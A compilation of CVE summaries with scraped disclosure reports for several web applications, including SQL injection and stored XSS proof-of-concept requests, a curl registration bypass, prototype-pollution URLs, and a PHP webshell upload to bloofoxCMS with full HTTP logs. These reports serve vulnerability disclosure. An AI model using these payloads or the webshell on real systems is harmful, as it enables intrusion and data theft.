Cross Site Scripting (XSS) vulnerability in Query Report feature in Zoho ManageEngine Password Manager Pro version 11001, allows remote attackers to execute arbitrary code and steal cookies via crafted JavaScript payload.

CVE-2020-27449: Release Notes - ManageEngine Password Manager Pro

SQL Injection in pear-admin-think version 2.1.2, allows attackers to execute arbitrary code and escalate privileges via crafted GET request to Crud.php.

pear-admin-think V2.1.2 has a sql injection vulnerability

sql injection vulnerability exists in pear-admin-think V2.1.2  
This vulnerability allows remote attackers to obtain user sensitive data and even command execution

url:/admin.php/admin.crud/list/name/admin\_admin?page=1&limit=10  
Vulnerability file:app/admin/controller/admin/Crud.php

        public function list($name)
        {
            $sql = Db::query('SELECT COLUMN_NAME,IS_NULLABLE,DATA_TYPE,IF(COLUMN_COMMENT = "",COLUMN_NAME,COLUMN_COMMENT) COLUMN_COMMENT FROM information_schema.COLUMNS WHERE TABLE_NAME = "' . $name . '"order by ORDINAL_POSITION asc');
            $this->jsonApi('', 0, $sql);
        }
    

Vulnerability exploitation:  
1.Log in backstage  
2.Curd:  
  

poc:

    GET /admin.php/admin.crud/list/name/123"union%20select%201,database(),3,4%23?page=1&limit=10 HTTP/1.1
    Host: www.padmin.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://www.padmin.com/admin.php/admin.crud/index
    Cookie: thinkphp_show_page_trace=0|0; _ga=GA1.2.82281587.1616725844; _gid=GA1.2.1061036003.1616725844; PHPSESSID=24b6f9927555352d4dbfbdf7c145d92a; thinkphp_show_page_trace=0|0; hash=606a3660a4af22638d896476e523344aa470e9b38ea908989711bb9abe5d92b57d31c36a923ed9bd379b16a871efca19b4d6847d9fc88b180e9f620c36a26b8a1f40fc99a846d2ac8eb60b4b4c8cc845
    X-Forwarded-For: 127.0.0.1
    X-Originating-IP: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1

CVE-2021-29378: pear-admin-think V2.1.2 has a sql injection vulnerability · Issue #I3DIEC · Pear Admin/Pear Admin Think - Gitee.com

Cross Site Scripting (XSS) vulnerability in Name Input Field in Contact Us form in Laborator Kalium before 3.0.4, allows remote attackers to execute arbitrary code.

CVE-2020-24075: Kalium Changelog - Laborator

An issue was discovered in FoldingAtHome Client Advanced Control GUI before commit 9b619ae64443997948a36dda01b420578de1af77, allows remote attackers to execute arbitrary code via crafted payload to function parse_message in file Connection.py.

@@ -0,0 +1,216 @@ ################################################################################ \# # \# Folding@Home Client Control (FAHControl) # \# Copyright (C) 2016-2020 foldingathome.org # \# Copyright (C) 2010-2016 Stanford University # \# # \# This program is free software: you can redistribute it and/or modify # \# it under the terms of the GNU General Public License as published by # \# the Free Software Foundation, either version 3 of the License, or # \# (at your option) any later version. # \# # \# This program is distributed in the hope that it will be useful, # \# but WITHOUT ANY WARRANTY; without even the implied warranty of # \# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # \# GNU General Public License for more details. # \# # \# You should have received a copy of the GNU General Public License # \# along with this program. If not, see <http://www.gnu.org/licenses/>. # \# # ################################################################################  
import re import json import sys  
  
NUMBER\_RE \= re.compile(r'(-?(?:0|\[1-9\]\\d\*))(\\.\\d+)?(\[eE\]\[-+\]?\\d+)?', (re.VERBOSE | re.MULTILINE | re.DOTALL)) FLAGS \= re.VERBOSE | re.MULTILINE | re.DOTALL STRINGCHUNK \= re.compile(r'(.\*?)(\["\\\\\\x00-\\x1f\])', FLAGS) BACKSLASH \= { '"': u'"', '\\\\': u'\\\\', '/': u'/', 'b': u'\\b', 'f': u'\\f', 'n': u'\\n', 'r': u'\\r', 't': u'\\t', }  
DEFAULT\_ENCODING \= "utf-8"  
  
def linecol(doc, pos): lineno \= doc.count('\\n', 0, pos) + 1 if lineno \== 1: colno \= pos + 1 else: colno \= pos \- doc.rindex('\\n', 0, pos) return lineno, colno  
  
def errmsg(msg, doc, pos, end\=None): \# Note that this function is called from \_json lineno, colno \= linecol(doc, pos) if end is None: fmt \= '{0}: line {1} column {2} (char {3})' return fmt.format(msg, lineno, colno, pos)  
endlineno, endcolno \= linecol(doc, end) fmt \= '{0}: line {1} column {2} - line {3} column {4} (char {5} - {6})' return fmt.format(msg, lineno, colno, endlineno, endcolno, pos, end)  
  
def \_decode\_uXXXX(s, pos): esc \= s\[pos + 1:pos + 5\]  
if len(esc) \== 4 and esc\[1\] not in 'xX': try: return int(esc, 16) except ValueError: pass  
msg \= "Invalid \\\\uXXXX escape" raise ValueError(errmsg(msg, s, pos))  
  
def pyon\_scanstring(s, end, encoding \= None, strict \= True, \_b \= BACKSLASH, \_m \= STRINGCHUNK.match): """Scan the string s for a JSON string. End is the index of the character in s after the quote that started the JSON string. Unescapes all valid JSON string escape sequences and raises ValueError on attempt to decode an invalid string. If strict is False then literal control characters are allowed in the string. Returns a tuple of the decoded string and the index of the character in s after the end quote.""" if encoding is None: encoding \= DEFAULT\_ENCODING chunks \= \[\] \_append \= chunks.append begin \= end \- 1  
while True: chunk \= \_m(s, end) if chunk is None: raise ValueError( errmsg("Unterminated string starting at", s, begin))  
end \= chunk.end() content, terminator \= chunk.groups()  
\# Content is contains zero or more unescaped string characters if content: if not isinstance(content, unicode): content \= unicode(content, encoding) \_append(content)  
\# Terminator is the end of string, a literal control character, \# or a backslash denoting that an escape sequence follows if terminator \== '"': break elif terminator != '\\\\': if strict: msg \= "Invalid control character {0!r} at".format(terminator) raise ValueError(errmsg(msg, s, end)) else: \_append(terminator) continue  
try: esc \= s\[end\] except IndexError: raise ValueError(errmsg("Unterminated string starting at", s, begin))  
\# If not a unicode escape sequence, must be in the lookup table if esc != 'u' and esc != 'x': try: char \= \_b\[esc\] except KeyError: msg \= "Invalid \\\\escape: " + repr(esc) raise ValueError(errmsg(msg, s, end)) end += 1  
elif esc \== 'x': \# Hex escape sequence try: code \= s\[end + 1: end + 3\] char \= code.decode('hex') except: raise ValueError(errmsg('Invalid \\\\escape: ' + repr(code), s, end))  
end += 3  
else: \# Unicode escape sequence uni \= \_decode\_uXXXX(s, end) end += 5 \# Check for surrogate pair on UCS-4 systems if sys.maxunicode \> 65535 and \\ 0xd800 <= uni <= 0xdbff and s\[end:end + 2\] \== '\\\\u': uni2 \= \_decode\_uXXXX(s, end + 1) if 0xdc00 <= uni2 <= 0xdfff: uni \= 0x10000 + (((uni \- 0xd800) << 10) | (uni2 \- 0xdc00)) end += 6 char \= unichr(uni)  
\# Append the unescaped character \_append(char)  
return u''.join(chunks), end  
  
  
def make\_pyon\_scanner(context): parse\_object \= context.parse\_object parse\_array \= context.parse\_array parse\_string \= context.parse\_string match\_number \= NUMBER\_RE.match strict \= context.strict parse\_float \= context.parse\_float parse\_int \= context.parse\_int parse\_constant \= context.parse\_constant object\_hook \= context.object\_hook object\_pairs\_hook \= context.object\_pairs\_hook  
  
def scan\_once(string, idx): try: nextchar \= string\[idx\] except IndexError: raise StopIteration(idx)  
if nextchar \== '"': return parse\_string(string, idx + 1, 'utf-8', strict) elif nextchar \== '{': return parse\_object((string, idx + 1), 'utf-8', strict, scan\_once, object\_hook, object\_pairs\_hook) elif nextchar \== '\[': return parse\_array((string, idx + 1), scan\_once) elif nextchar \== 'N' and string\[idx:idx + 4\] \== 'None': return None, idx + 4 elif nextchar \== 'T' and string\[idx:idx + 4\] \== 'True': return True, idx + 4 elif nextchar \== 'F' and string\[idx:idx + 5\] \== 'False': return False, idx + 5  
m \= match\_number(string, idx) if m is not None: integer, frac, exp \= m.groups() if frac or exp: res \= parse\_float(integer + (frac or '') + (exp or '')) else: res \= parse\_int(integer)  
return res, m.end()  
elif nextchar \== 'N' and string\[idx:idx + 3\] \== 'NaN': return parse\_constant('NaN'), idx + 3  
elif nextchar \== 'I' and string\[idx:idx + 8\] \== 'Infinity': return parse\_constant('Infinity'), idx + 8  
elif nextchar \== '-' and string\[idx:idx + 9\] \== '-Infinity': return parse\_constant('-Infinity'), idx + 9  
else: raise StopIteration(idx)  
  
return scan\_once  
  
class PYONDecoder(json.JSONDecoder): def \_\_init\_\_(self, \*args, \*\*kwargs): json.JSONDecoder.\_\_init\_\_(self, \*args, \*\*kwargs) self.parse\_string \= pyon\_scanstring self.scan\_once \= make\_pyon\_scanner(self)

CVE-2020-27544: Use PYONDecoder instead of eval() · FoldingAtHome/fah-control@9b619ae

Cross Site Scripting (XSS) vulnerability in content1 parameter in demo.jsp in kindsoft kindeditor version 4.1.12, allows attackers to execute arbitrary code.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-28717: XSS vulnerability in demo.jsp · Issue #321 · kindsoft/kindeditor

Cross Site Scripting (XSS) vulnerability in UserController.php in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted user_login.

At vendor/thinkcmf/cmf-app/src/admin/controller/UserController.php

There is no filtering of the user's post requests.

For example:

line 138:

$result             = DB::name('user')->insertGetId($_POST);

line 221:  
$result = DB::name('user')->update($_POST);

So There is a Stored XSS vulnerability in user management,

POC:

    POST /admin/user/addpost.html HTTP/1.1
    Host: test.net
    Connection: close
    Content-Length: 115
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https://test.net
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://test.net/admin/user/add.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: thinkphp_show_page_trace=0|0; admin_username=admin; PHPSESSID=ju91k4c4do16sl2qqac553edl1
    
    user_login=%3Cimg+src%3D''+onerror%3Dalert(%2Fxss%2F)%3E&user_pass=123456&user_email=1111%40qqq.com&role_id%5B%5D=2

CVE-2020-25915: There is a store Stored XSS vulnerability in user management · Issue #675 · thinkcmf/thinkcmf

Cross Site Scripting (XSS) vulnerability in margox braft-editor version 2.3.8, allows remote attackers to execute arbitrary code via the embed media feature.

Dear Author,  
I’m testivy. I found that the current version of braft-editor has a a cross-site scripting (XSS) allows remote attackers to run arbitrary web script inside an div embed media element by injecting a crafted HTML element into the editor.  
As the offical demo site shown:  
https://braft.margox.cn/demos/basic  
or  
https://braft.margox.cn/  
  
When I come to the media library toolbar and choose the "adding network network resources " button below,and then select the embed media item as the figure shown below:  
  

****Loopholes Reproduce****

1.  Inject a crafted HTML element into the editor just like this  
    <img/src=1 onerror=alert(1)>
2.  Click the insert button  
    
3.  Click the play button to play the inserted video in this editor
4.  View the page and you will see a pop-up which running the arbitrary web script inside.  
    

****Vulnerability details****

This problem mainly occurs in braft-editor/src/renderers/atomics/Embed/index.jsx 

    return (
        <div className="bf-embed-wrap">
          <PlayerModal
            type="embed"
            onRemove={removeEmbed}
            poster={meta ? meta.poster || '' : ''}
            language={language}
            url={url}
            name={name}
            title={language.videoPlayer.embedTitle}
          >
            <div
              className="bf-embed-player"
              dangerouslySetInnerHTML={{ __html: url }}
            />
          </PlayerModal>
        </div>
    

As we can see, the above dangerouslySetInnerHTML ,this accept the url variable from the input without escape that could lead to run the arbitrary code even stealing the user's cookie. .etc.  
If we input the simple script like "<img/src=1 onerror=alert(1)>",the brower will render it to the html as below:  
<div class="bf-embed-player"><img src="1" onerror="alert(1)"></div> and finally pop a alert window.

Best Regards

CVE-2021-27524: Report a cross-site scripting (XSS)  security vulnerability in the braft-editor  allowing remote attackers to run arbitrary web script inside an div embed media element by injecting a crafted HTML ele

An issue was discovered in open-falcon dashboard version 0.2.0, allows remote attackers to gain, modify, and delete sensitive information via crafted POST request to register interface.

Dear Author,  
I’m testivy. I found that the latest version 0.2.0 of falcon dashboard has a bypass problem of the registeration.As the link below:  
http://book.open-falcon.com/en\_0\_2/quick\_install/frontend.html#dashboard-user-management  
when we try to change the value of item "signup\_disable" to "true" in the API configuration file "cfg.json" then reboot API for a purpose to restrict the register function meaning that this is only for "sign in" not for "sign up".  
I found in the code that I can bypass it under the "/auth/register " interface. In this condition, I can bypass the registeration restriction and do as below:  
Call the user added interface and add a new user (POST https://127.0.0.1:8081/auth/register name=test&cnname=test&email=test@test.cn&password=xxx&repeat_password=xxx), then use the newly added account to log in to the dashboard for viewing ,modifing, and adding .

**Vulnerability details**  
This problem mainly occurs in _dashboard/rrd/view/auth/auth.py_

    @app.route("/auth/register", methods=["GET", "POST"])
    def auth_register():
        if request.method == "GET":
            if g.user:
                return redirect("/auth/login")
            return render_template("auth/register.html", **locals())
    
        if request.method == "POST":
            ret = {"msg":""}
    
            name = request.form.get("name", "").strip()
            cnname = request.form.get("cnname", "").strip()
            email = request.form.get("email", "").strip()
            password = request.form.get("password", "")
            repeat_password = request.form.get("repeat_password", "")
    
    

As we can see, the above if branches:  
in **if request.method == "GET"** will judge the g.user otherwise redirect to "/auth/login" ,But when the request.method == "POST",the system will get request param to add a account by "name,cnname,email,password and repeat\_password" to the backend. Under the certain circumstances,we can directly call the "auth/register" interface with post method to add a new user.

**Loopholes Reproduce**  
1.curl -XPOST 'http://127.0.0.1:8081/auth/register'  --data 'name=test&cnname=test&email=test%40test.cn&password=test1234&repeat_password=test1234'  
As we can see, register restriction has been bypassed and a new account has been added to the dashboard management without logging in.  
The response is as below:  
{"msg":""}   
2.View the console  

Visit the index page http://127.0.0.1:8081/, then log in to the new account, and you will can do anything.

Best Regards

CVE-2021-27523: Report a security vulnerability in falcon dashboard to bypass register restriction through the function in register has been closed · Issue #153 · open-falcon/dashboard

Prototype pollution vulnerability in MrSwitch hello.js version 1.18.6, allows remote attackers to execute arbitrary code via hello.utils.extend function.

**Abstract**

The function hello.utils.extend, defined in file hello.js, introduces a Prototype Pollution vulnerability, which could result in Cross-Site Scripting.

hello.utils \= {

// Extend the first object with the properties and methods of the second

extend: function(r /\*, a\[, b\[, ...\]\] \*/) {

// Get the arguments as an array but ommit the initial item

Array.prototype.slice.call(arguments, 1).forEach(function(a) {

if (Array.isArray(r) && Array.isArray(a)) {

Array.prototype.push.apply(r, a);

}

else if (r && (r instanceof Object || typeof r \=== 'object') && a && (a instanceof Object || typeof a \=== 'object') && r !== a) {

for (var x in a) {

r\[x\] \= hello.utils.extend(r\[x\], a\[x\]);

}

}

else {

if (Array.isArray(a)) {

// Clone it

a \= a.slice(0);

}

r \= a;

}

});

return r;

}

};

The code on Line 29 has a typical pattern of Prototype Pollution.

    r[x] = hello.utils.extend(r[x], a[x]);
    

The vulnerable lines of code, then, are called on Line 1320, which could allow attackers to pollute the object in JavaScript.  

p \= \_this.merge(\_this.param(location.search || ''), \_this.param(location.hash || ''));

**Proof of Concepts**

As a result, websites, which use the hello.js, might highly likely have Cross-Site Scripting. Take the offical demo of hello.js as an example, the Prototype Pollution could be exploited as follows:

https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22\_\_proto\_\_%22:{%22callback%22:%22alert%22}}  
https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22\_\_proto\_\_%22:{%22onbeforescriptexecute%22:%22alert(location.href)%22}}  

**Suggestion**

*   Freeze the prototype— use Object.freeze (Object.prototype).
*   Require schema validation of JSON input.
*   Avoid using unsafe recursive merge functions.
*   Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
*   As a best practice use Map instead of Object.

CVE-2021-26505: Prototype Pollution in hello.js · Issue #634 · MrSwitch/hello.js

File Upload vulnerability in bloofoxCMS version 0.5.2.1, allows remote attackers to execute arbitrary code and escalate privileges via crafted webshell file to upload module.

I want to report an arbitrary file upload vulnerability that I found in bloofoxcms 0.5.2.1, through which we can upload webshell and control the web server.  
After entering the web management background, we can use the upload function to upload files：  
  
We create a new webshell file and name it script.php ：

    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
    

Click to select this file(script.php) :  
  
Click upload file(s) and grab the data package:  
  
First request package:

    POST /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------36808327791705981033859481452
    Content-Length: 1187
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="dir"
    
    ../media/images/
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file1"; filename="script.php"
    Content-Type: application/octet-stream
    
    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
     
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file2"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file3"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file4"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file5"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="send"
    
    Upload File(s)
    -----------------------------36808327791705981033859481452--
    
    

First response package ：

    HTTP/1.1 302 Found
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:43:52 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    LOCATION: index.php?mode=tools&page=upload
    Content-Length: 0
    

Then we follow 302 redirection，  
Second request package ：

    GET /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    

Second response package ：

    HTTP/1.1 200 OK
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:44:38 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 6820
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    
    <html>
    <head>
    <title>bloofoxCMS Admincenter</title>
    <meta http-equiv="Content-Type" content="text/html; charset=" />
    <meta name="AUTHOR" content="bloofox, Alexander Lang" />
    <meta name="COPYRIGHT" content="bloofox.com, Alex Lang" />
    <meta name="DATE" content="12/25/2020" />
    <meta name="DESCRIPTION" content="bloofoxCMS Admincenter is the backend for managing the contents of bloofoxCMS" />
    <meta name="TITLE" content="bloofoxCMS Admincenter" />
    <link rel="stylesheet" type="text/css" href="../templates/admincenter/admincenter.css" />
    <link rel="icon" href="../media/images/favicon.ico" type="image/x-icon" />
    <link rel="shortcut icon" href="../media/images/favicon.ico" type="image/x-icon" />
    
    <script type="text/javascript" src="functions.js"></script>
    
    </head>
    
    <body>
    <div id="profile">
    	<a class='edit' href='index.php?page=myprofile' title='Edit Profile'><img src='../templates/admincenter/images/icon-set16/profile_edit.png' alt='Edit Profile' border='0' width='16' height='16' /></a>  <a href='index.php?page=myprofile'>Edit Profile</a><br />
    	<a class='edit' href='index.php?page=changepw' title='Change Password'><img src='../templates/admincenter/images/icon-set16/edit.png' alt='Change Password' border='0' width='16' height='16' /></a>  <a href='index.php?page=changepw'>Change Password</a><br /> 
    	<a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a><br />
    	
    	<div class="close">
    	<a href="#" onclick="show_hide_layers('profile','','hide');">Close [x]</a>
    	</div>
    </div>
    
    <div id="wrap">
    	<div id="header">
    	<div style="float: left;"><span class="bold">bloofoxCMS Admincenter</span></div>
    	<div style="text-align: right; font-size: 11px; font-weight: bold;">
    	<a href="#" onclick="show_hide_layers('profile','','show');">Username: admin</a> &nbsp;&nbsp; <a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a></div> 
    	<hr />
    	</div>
    	
    	<div id="sidebar">
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php" title='Home'>Home</a></li> 
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=content" title='Contents'>Contents</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=content&page=levels">Structure</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=pages">Pages</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=articles">Articles</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=media">Media</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=settings" title='Administration'>Administration</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=settings">Settings</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=projects">Projects</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=lang">Languages</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=tmpl">Templates</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=plugins">Plugins</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=charset">Charsets</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=user" title='Security'>Security</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=user">User</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=groups">User Groups</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=permissions">Permissions</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=sessions">Sessions</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='current' href="index.php?mode=tools" title='Tools'>Tools</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=tools">Maintenance</a></li>
    	<li><a class='subcurrent' href="index.php?mode=tools&page=upload">Upload</a></li>
    	
    	
    	<li><a class='subalways' href="index.php?mode=tools&page=phpmyadmin">PhpMyAdmin</a></li>
    	<li><a class='subalways' href="index.php?mode=tools&page=stats">Statistics</a></li>
    </ul>
    </div>
    </div>
    	<div id="space"></div>
    	<div id="main" onclick="show_hide_layers('profile','','hide');">
    		<div id="content">
    		
    		
    <h2>Tools / Upload</h2>
    <div id="content-inlay">
    
    <p class='ok'><img src='../templates/admincenter/images/icon-set16/ok.png' alt='ok.png' border='0' width='16' height='16' /> Files have been uploaded successful.</p>
    
    <form action="index.php?mode=tools&page=upload" method="post" enctype="multipart/form-data">
    <table class="list">
    <tr class='bg_color3'>
    	<td width="150"></td>
    	<td></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Directory</td>
    	<td><select name='dir'><option value='../media/images/'>../media/images/</option><option value='../media/files/'>../media/files/</option><option value='../languages/'>../languages/</option><option value='../templates/admincenter'>../templates/admincenter</option><option value='../templates/default'>../templates/default</option><option value='../media/images/profiles'>../media/images/profiles</option></select></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Template Image</td>
    	<td><input type='checkbox' name='tmplimage' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file1' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file2' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file3' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file4' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file5' size='30' maxlength='250' /></td>
    </tr>
    </table>
    <br />
    <input class='btn' type='submit' name='send' value='Upload File(s)' />
    </form>
    </div>
    
    		
    		</div>
    	</div>
    
    	<div id="footer">
    	<hr />
    	<div style="text-align: right; float: right; font-size: 11px;"><a href='#'>Back to Top</a></div>
    	<div style="text-align: left; font-size: 11px;">
    Powered by <a href="http://www.bloofox.com" target="bloofox">bloofoxCMS</a> &copy; 2012</div>
    	</div>
    </div>
    
    </body>
    </html>
    

We can see that the file has been successfully uploaded to /bloofoxcms/media/images/script.php  

Finally, we can access the webshell address and execute any command：

Tag

#js